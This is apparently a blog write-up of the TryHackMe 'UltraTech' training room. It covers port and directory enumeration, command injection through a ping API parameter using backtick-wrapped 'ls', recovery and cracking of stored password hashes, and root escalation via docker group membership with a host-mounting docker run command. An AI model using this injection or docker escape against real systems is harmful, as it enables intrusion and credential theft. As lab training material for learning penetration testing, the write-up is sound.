TryHackMe | UltraTech

A TryHackMe room that involves the basics of penetration testing, enumeration, privilege escalation and webapp testing.

Ultratech

Tasks

  • Identify software on ports.
  • Identify OS
  • Identify routes of web app.
  • Find database name
  • Find credentials
  • Get private SSH key.

Vulnerabilities

  • API is not secure.Should practice least privilege.
  • Weak password.

Nmap

Discovered open port 21/tcp on 10.10.112.55 vsftpd 3.0.3
Discovered open port 22/tcp on 10.10.112.55 opensh 7.6p1
Discovered open port 8081/tcp on 10.10.112.55 Node.js
Discovered open port 31331/tcp on 10.10.122.55 Apache

I used tag -v to print out the open ports when found.

Gobuster

  • Navigate to the apache web server on port 31331.
  • Let’s find a directory that we can exploit.
/images               (Status: 301) [Size: 322]/index.html           (Status: 200) [Size: 6092]                                       
/index.html (Status: 200) [Size: 6092]
/javascript (Status: 301) [Size: 326]
/js (Status: 301) [Size: 318

/partners.html (Status: 200) [Size: 1986]
/robots.txt (Status: 200) [Size: 53]
/robots.txt (Status: 200) [Size: 53]
/server-status (Status: 403) [Size: 303]
/what.html (Status: 200) [Size: 2534]

Foothold

  • We can navigate to the login page at /partners.html
  • Brute-forcing the login page doesn’t work since we don’t have credentials.
  • Looking at the Network Traffic it seems the API is performing code execution.
http://10.10.112.55:8081/ping?ip=10.10.112.55
  • Tinkering a bit with the value, it can perform unix code execution.
10.10.112.55:8081/ping?ip=`ls`
ping: utech.db.sqlite: Name or service not known
  • Let’s cat out the credentials in utech.db.sqlite
(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84
  • hashid confirms it is MD variant.
  • The hash was cracked using rockyou.txt as n100906
  • We are able to SSH into the server using r00t:n100906

Privesc

  • User is not able to run sudo
r00t@ultratech-prod: sudo -l
Sorry, user r00t may not run sudo on this machine.
  • Use linpeas to enumerate.
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
  • We are apart of the docker group, perhaps there is an entry for it on GTFObins.
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • Alpine will be the image, but since there isn’t one locally, we’ll list out images that are available in the machine.
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS                     PORTS               NAMES
7beaaeecd784 bash "docker-entrypoint.s…" 2 years ago Exited (130) 2 years ago unruffled_shockley
696fb9b45ae5 bash "docker-entrypoint.s…" 2 years ago Exited (127) 2 years ago boring_varahamihira
9811859c4c5c bash "docker-entrypoint.s…" 2 years ago Exited (127) 2 years ago boring_volhard
  • Now let’s run that with docker
docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • And now we are root.
  • Head over to the root directory and .ssh to find the private key.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store